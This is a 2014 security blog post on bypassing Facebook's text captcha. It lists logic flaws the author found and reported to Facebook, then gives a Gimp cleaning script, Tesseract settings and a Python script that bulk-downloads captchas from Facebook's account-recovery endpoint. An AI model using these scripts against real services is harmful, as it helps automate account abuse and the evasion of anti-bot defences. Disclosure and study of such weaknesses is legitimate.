Thursday, 10 July 2014

How to Bypass Facebook's Text Captcha

In this post I'll discuss Facebook's text captcha and how to bypass it with a little Gimp-Fu image cleaning and Tesseract OCR. The techniques below build on previous work where I demonstrated how to bypass Bugcrowd's captcha.


The Facebook Captcha(s)

I've seen Facebook use two captchas. The first is the friend photo captcha, where you are required to select your friends in pictures. This one seemed hard to bypass (except when you attack your friend's account and know all of their friends).


The second type is the text-based captcha, where you just enter the letters/numbers shown in the image. Something like this:


Let's look at some ways to bypass the text captcha :)


A couple of logic flaws...

My original aim was to focus on OCR with Tesseract but it turns out the captcha had logic flaws as well.

Issue #1 - When entering the captcha not all of the characters needed to be correct. If you got one character wrong it would still be accepted.

Issue #2 - The captcha check is case insensitive. Despite using uppercase and lowercase letters in the captcha images, the server didn't actually verify the case of user input.

Issue #3 - Captcha repetition...


Each captcha should have contained a dynamically generated string randomly chosen from a pool of 62^7 possibilities. For some reason though I encountered repetition. This is obviously very bad as with a limited set of captchas an attacker can just download every image, solve them all and achieve a 100% bypass rate in the future. I have no idea what the cause of this issue was and Facebook didn't release any details.
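
To put those numbers in perspective, here is a rough back-of-the-envelope sketch. The 62-character alphabet and 7-character length come from the figure above; the "accepted answers" count assumes the server ignores case and tolerates exactly one wrong character at any position, which is my reading of Issues #1 and #2 rather than a confirmed detail of Facebook's check.

```python
from math import comb

# Alphabet and length as described above: a-z, A-Z, 0-9 and 7 characters.
ALPHABET_SIZE = 26 + 26 + 10
FOLDED_SIZE = 26 + 10  # alphabet once upper/lowercase are treated as equal
LENGTH = 7

def keyspace(alphabet_size, length):
    """Number of distinct strings of the given length."""
    return alphabet_size ** length

def accepted_answers(alphabet_size, length, max_wrong=1):
    """Strings within max_wrong substitutions of the answer (assumed rule)."""
    return sum(comb(length, k) * (alphabet_size - 1) ** k
               for k in range(max_wrong + 1))

full = keyspace(ALPHABET_SIZE, LENGTH)        # intended pool of captchas
folded = keyspace(FOLDED_SIZE, LENGTH)        # pool once case is ignored
lenient = accepted_answers(FOLDED_SIZE, LENGTH)  # answers accepted per captcha
print(full, folded, lenient)
```

Under those assumptions the pool is large, but each captcha accepts a few hundred answers instead of one, and none of that matters if the same images keep coming back.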

The logic flaws were interesting but let's not forget OCR as well!


Back to the image...

Let's take a look at a Facebook captcha image:


When thinking about OCR analysis there are a few things to note:
  • Letters/numbers themselves are clearly displayed in black - Good
  • Minimal overlaying, wiggling and distortion is used - Good
  • Black scribbles add noise to the background - Bad
  • White scribbles effectively remove pixels from the characters - Bad

I did some testing with Tesseract and found that noise, image size, character size and spacing all had a big impact on the accuracy of results. For example, directly analysing the image above returned invalid characters or no response at all. To improve Tesseract's results I needed some way to get rid of the noise and repair the damaged characters.


Step #1 Cleaning 

I chose to use Gimp for my image cleaning as it was a program I was familiar with and it offered command line processing with Python. While the documentation (here and here) and debugging aren't too good, it gets the job done.

First I loaded the image and doubled its size, as I found that processing the smaller image was less accurate and reduced the quality of the final image.
#Load image
image = pdb.gimp_file_load(file, file)
drawable = pdb.gimp_image_get_active_layer(image)
#Double image size
pdb.gimp_image_scale(image,560,142)

Next I removed the background noise. I selected everything black and then shrank the selection, which dropped the thin black lines from the selection and left just the black letters. To actually paint over the noise I re-grew the selection, inverted it and filled with white.
#Select by color black
pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
#Shrink selection by 1 pixel
pdb.gimp_selection_shrink(image,1)
#Grow selection by 2 pixels
pdb.gimp_selection_grow(image,2)
#Fill black
pdb.gimp_context_set_foreground((0,0,0))
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
pdb.gimp_edit_fill(drawable,0)
#Invert selection
pdb.gimp_selection_invert(image)
#Fill white
pdb.gimp_context_set_foreground((255,255,255))
pdb.gimp_edit_fill(drawable,0)
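
The shrink-then-grow trick is essentially what image processing calls erosion followed by dilation. The sketch below shows the idea on a tiny binary grid in plain Python. It is not what Gimp runs internally: the 3x3 neighbourhood, the grid and the function names are all illustrative assumptions, and it grows by one pixel where the script above grows by two.

```python
NEIGHBOURS = [(dy, dx) for dy in (-1, 0, 1) for dx in (-1, 0, 1)]

def _is_set(mask, y, x):
    """True if (y, x) is inside the grid and black; outside counts as white."""
    return 0 <= y < len(mask) and 0 <= x < len(mask[0]) and bool(mask[y][x])

def erode(mask):
    """Shrink by 1: keep a pixel only if it and all 8 neighbours are set."""
    return [[int(all(_is_set(mask, y + dy, x + dx) for dy, dx in NEIGHBOURS))
             for x in range(len(mask[0]))] for y in range(len(mask))]

def dilate(mask):
    """Grow by 1: set a pixel if it or any of its 8 neighbours is set."""
    return [[int(any(_is_set(mask, y + dy, x + dx) for dy, dx in NEIGHBOURS))
             for x in range(len(mask[0]))] for y in range(len(mask))]

# 1 = black pixel. A 3x3 "character" blob plus a 1-pixel-thick noise line.
noisy = [
    [0, 0, 0, 0, 0, 0, 0],
    [0, 1, 1, 1, 0, 0, 0],
    [0, 1, 1, 1, 0, 0, 0],
    [0, 1, 1, 1, 0, 0, 0],
    [0, 0, 0, 0, 0, 0, 0],
    [1, 1, 1, 1, 1, 1, 1],
    [0, 0, 0, 0, 0, 0, 0],
]
cleaned = dilate(erode(noisy))
for row in cleaned:
    print("".join("#" if p else "." for p in row))
```

The thin line has no pixel that survives the shrink, so there is nothing left to grow back, while the thicker blob is restored from its surviving core.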

With the outside black noise removed I inverted again to reselect the letters/numbers then translated up and down, painting after each translation. This helped fill in the white lines that in general streaked horizontally through the black characters.
#Invert selection
pdb.gimp_selection_invert(image)
pdb.gimp_context_set_foreground((0,0,0))
#Translate selection 4 pixels down (positive y offsets move down) and paint
pdb.gimp_selection_translate(image,0,4)
pdb.gimp_edit_fill(drawable,0)
#Translate selection 10 pixels up (6 above its starting position) and paint
pdb.gimp_selection_translate(image,0,-10)
pdb.gimp_edit_fill(drawable,0)
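
To see why painting shifted copies of the selection repairs the characters, here is a minimal plain-Python sketch of the same idea. The grid, the one-row shifts and the helper names are made up for illustration; the Gimp script uses larger offsets on the enlarged image.

```python
def shift_rows(mask, dy):
    """Return a copy of mask moved dy rows down (negative dy moves it up)."""
    height, width = len(mask), len(mask[0])
    out = [[0] * width for _ in range(height)]
    for y in range(height):
        src = y - dy
        if 0 <= src < height:
            out[y] = list(mask[src])
    return out

def union(a, b):
    """Pixel-wise OR of two masks of the same size."""
    return [[int(p or q) for p, q in zip(row_a, row_b)]
            for row_a, row_b in zip(a, b)]

# 1 = black pixel. A vertical stroke cut in two by a white scribble.
stroke = [
    [0, 1, 1, 0],
    [0, 1, 1, 0],
    [0, 1, 1, 0],
    [0, 0, 0, 0],  # white scribble removed this row
    [0, 1, 1, 0],
    [0, 1, 1, 0],
    [0, 1, 1, 0],
]
# Paint the stroke again one row lower and one row higher.
repaired = union(stroke, union(shift_rows(stroke, 1), shift_rows(stroke, -1)))
for row in repaired:
    print("".join("#" if p else "." for p in row))
```

The trade-off is that every character also gets slightly taller, which is acceptable here because the streaks are mostly horizontal.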

With the processing done I resized the image back to its original size and saved it.
#Resize image
pdb.gimp_image_scale(image,280,71)
#Export
pdb.gimp_file_save(image, drawable, file, file)
pdb.gimp_image_delete(image)

I've included the full script at the bottom of this post. I ran it with the following command:
gimp-console-2.8.exe -i -b "(python-clean RUN-NONINTERACTIVE \"test.png\")" -b "(gimp-quit 0)"

As an example, cleaning the image above I got this:



Step #2 Submitting to Tesseract

With the image now cleaned it was ready for Tesseract. To improve the accuracy of results I selected the single word page segmentation mode (-psm 8) and restricted the character set with a custom config file (nobatch fb).
tesseract.exe test.png output -psm 8 nobatch fb

I created the fb config file in "C:\Program Files (x86)\Tesseract-OCR\tessdata\configs". It contained the following whitelist:
tessedit_char_whitelist abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
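
If you would rather generate the config and the command from Python, something like the following sketch should work. The helper names and the captcha.png filename are hypothetical; the whitelist and the arguments simply mirror what is shown above.

```python
import string

# Same 62 characters as the whitelist above.
WHITELIST = string.ascii_lowercase + string.ascii_uppercase + "1234567890"

def whitelist_config(chars=WHITELIST):
    """Contents of a Tesseract config file restricting recognised characters."""
    return "tessedit_char_whitelist " + chars + "\n"

def tesseract_command(image, output_base, exe="tesseract"):
    """Argument list mirroring the command above (old-style -psm flag)."""
    return [exe, image, output_base, "-psm", "8", "nobatch", "fb"]

print(whitelist_config(), end="")
print(tesseract_command("captcha.png", "output"))
```

The list can be handed to subprocess.run once the config file has been written to the tessdata\configs folder. Newer Tesseract releases spell the page segmentation flag --psm, so adjust the list if you are not on the version used here.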


Step #3 Automate everything with Python

I didn't bother to build a fully working POC to automate a real attack - I'm leaving this step as homework for you guys, best script wins $1 via Paypal ;) (I am of course joking, don't actually do this!)

Theoretically though, if you did want to build a fully functioning script you'd just need to take the Python script from my Bugcrowd post and the cleaning script from this post, combine and pwn.

Also the following can be used to download Facebook captchas after you have triggered the Facebook defenses:
import re
from urllib.error import URLError
from urllib.parse import urlencode
from urllib.request import Request, urlopen, urlretrieve

def getpage():
    #Returns (ccode, chash) match lists, or two empty lists on failure
    try:
        print("[+] POSTing to fb")
        params = {'lsd':'AVrQ4y7A', 'email':'09262073366', 'did_submit':'Search', '__user':'0', '__a':'1', '__dyn':'7wiUdp87ebG58mBWo', '__req':'p','__rev':'1114696','captcha_persist_data':'abc','recaptcha_challenge_field':'','captcha_response':'abc','confirmed':'1'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://www.facebook.com/ajax/login/help/identify.php?ctx=recover")
        request.add_header('Cookie', 'locale=en_GB;datr=Ku2xUhSA3kShtkMud0JXRHCY; reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2F%3Fstype%3Dlo%26jlou%3DAfco_1iUuf5XPNAuu9SBYhFnEoJfgxIw_9vwHlTfaTRjGB2Ac4VOSLHb018RjcLg3JVRsiY-sQlRSM00X59eKhLh5SJGHltQ0hEQ2WAiRR9A_g%26smuh%3D28853%26lh%3DAc-vs8zSU-_-6kh2%26aik%3Dqh9ABV52OPB3zXxCyUTNXw;')
        #Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        #Pull out the challenge code and challenge hash candidates
        ccode = re.findall('[a-z0-9-]{43}', response)
        chash = re.findall('[a-zA-Z0-9_-]{814}', response)
        print("[+] Parsed response")
        return ccode, chash
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")
        return [], []

def getcaptcha(i, ccode, chash):
    #Skip this round if the response did not contain the expected values
    if len(ccode) < 1 or len(chash) < 2:
        print("*****Error: Captcha parameters not found*****")
        return
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://www.facebook.com/captcha/tfbimage.php?captcha_challenge_code="+ccode[0]+"&captcha_challenge_hash="+chash[1]
        urlretrieve(captchaurl,'fbcap'+str(i)+'.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")

print("[+] Start!")
for i in range(0, 1000):
    #Download page and parse data
    ccode, chash = getpage()
    #Download captcha image
    getcaptcha(i, ccode, chash)
print("[+] Finished!")



Final Results

So I guess you're wondering, how accurate was Tesseract? Well, on a sample of 50 captchas that had been cleaned with Gimp, Tesseract read every character correctly about 20% of the time. However, taking into account the logic flaws, the actual pass rate jumped to 50%.
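
To make the gap between those two figures concrete, here is a small sketch of how OCR output can be scored under an exact check versus a lenient one. The lenient rule (ignore case, allow one wrong character, same length) is my assumption about how the server behaved based on the logic flaws above, and the sample pairs are made up purely for illustration, not taken from my test set.

```python
def exact_match(expected, guess):
    """Strict check: every character and its case must match."""
    return expected == guess

def lenient_match(expected, guess, max_wrong=1):
    """Assumed server rule: ignore case, allow up to max_wrong wrong characters."""
    if len(expected) != len(guess):
        return False
    wrong = sum(a != b for a, b in zip(expected.lower(), guess.lower()))
    return wrong <= max_wrong

def pass_rate(pairs, check):
    """Fraction of (expected, guess) pairs accepted by the given check."""
    return sum(check(expected, guess) for expected, guess in pairs) / len(pairs)

# Made-up (captcha text, OCR output) pairs.
samples = [
    ("aB3dE7g", "aB3dE7g"),  # perfect read
    ("Qw9RtY2", "qw9rty2"),  # case errors only
    ("m4NpX8z", "m4NpX8s"),  # one wrong character
    ("H7jK2Lp", "H1jK2Ld"),  # two wrong characters
]
print(pass_rate(samples, exact_match), pass_rate(samples, lenient_match))
```

Near misses that a strict check would reject count as passes under the lenient rule, which is why the same OCR output scores so much higher.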

Some example results:


It's quite impressive seeing how well both the Gimp cleaning and Tesseract analysis performed. Although you can also see how even subtle changes in the initial image can significantly affect both cleaning output and final analysis.


Facebook Fix #1

After reporting these issues the captcha repetition was addressed pretty quickly. The other logic flaws were left unchanged. The image itself was modified to make the characters/noise thicker:


Unfortunately this had little effect on the captcha strength, as it's the thickness of the noise relative to the characters that matters, not the absolute thickness. Making the noise thicker and the characters thinner would have prevented noise removal through selection shrinking.
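
A toy model makes the point. Assume, as a simplification, that a stroke of a given pixel width survives a shrink of r pixels only if it is at least 2r + 1 pixels wide. The widths below are hypothetical, not measurements from the real images.

```python
def survives_shrink(width, radius):
    """Simplified model: a stroke survives if some pixel is deeper than radius."""
    return width >= 2 * radius + 1

def separating_radii(noise_width, char_width, max_radius=10):
    """Shrink radii that erase the noise but leave the characters behind."""
    return [r for r in range(1, max_radius + 1)
            if not survives_shrink(noise_width, r)
            and survives_shrink(char_width, r)]

# Hypothetical (noise width, character width) pairs in pixels.
scenarios = {
    "original": (2, 6),
    "both thicker": (4, 12),
    "thick noise, thin characters": (6, 4),
}
for name, (noise, char) in scenarios.items():
    print(name, separating_radii(noise, char))
```

As long as the characters are thicker than the noise there is always some shrink radius that separates them. Only when the noise is at least as thick as the characters does the list come back empty.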


Final Thoughts

Another day, another captcha bypass. Whether you use Tesseract or a bad-ass custom neural network like Google or Vicarious, text captchas can be bypassed with relative ease. I managed a 20% pass rate with OCR alone (50% once the logic flaws were counted), and I'm sure that with a better cleaning process and/or Tesseract training this could be pushed a lot higher. It's time to ditch that text captcha.

Facebook said that right now the captcha is used more as a mechanism to slow down attacks as opposed to stopping attacks completely. The captcha will eventually be fixed but there are no plans at the moment.

Shout out to Facebook security for their help looking into this issue. Thanks for reading. Questions and comments are always appreciated, just leave a message below.

Pwndizzle out


############################################
#Gimp-Fu cleaning script, based on stackoverflow script here:
#http://stackoverflow.com/questions/12662676/writing-a-gimp-python-script?rq=1

from gimpfu import pdb, main, register, PF_STRING

def clean(file):
    #Load image
    image = pdb.gimp_file_load(file, file)
    drawable = pdb.gimp_image_get_active_layer(image)
    #Double image size
    pdb.gimp_image_scale(image,560,142)
    #Select by color black
    pdb.gimp_by_color_select(drawable,"#000000",20,2,0,0,0,0)
    #Shrink selection by 1 pixel
    pdb.gimp_selection_shrink(image,1)
    #Grow selection by 2 pixels
    pdb.gimp_selection_grow(image,2)
    #Fill black
    pdb.gimp_context_set_foreground((0,0,0))
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    #Fill white
    pdb.gimp_context_set_foreground((255,255,255))
    pdb.gimp_edit_fill(drawable,0)
    #Invert selection
    pdb.gimp_selection_invert(image)
    pdb.gimp_context_set_foreground((0,0,0))
    #Translate selection 4 pixels down (positive y offsets move down) and paint
    pdb.gimp_selection_translate(image,0,4)
    pdb.gimp_edit_fill(drawable,0)
    #Translate selection 10 pixels up (6 above its starting position) and paint
    pdb.gimp_selection_translate(image,0,-10)
    pdb.gimp_edit_fill(drawable,0)
    #Resize image
    pdb.gimp_image_scale(image,280,71)
    #Export
    pdb.gimp_file_save(image, drawable, file, file)
    pdb.gimp_image_delete(image)

args = [(PF_STRING, 'file', 'GlobPattern', '*.*')]
register('python-clean', '', '', '', '', '', '', '', args, [], clean)

main()

############################################

21 comments:

  1. This is a great deduction.

  2. Hi,

    Your Gimp script no longer removes all of the noise from the image. I am creating a Facebook captcha reader. Would you help me with this?

  3. Unfortunately I'm busy with other work right now. Don't give up though, filtering should be able to help with a lot of different captcha variations :)
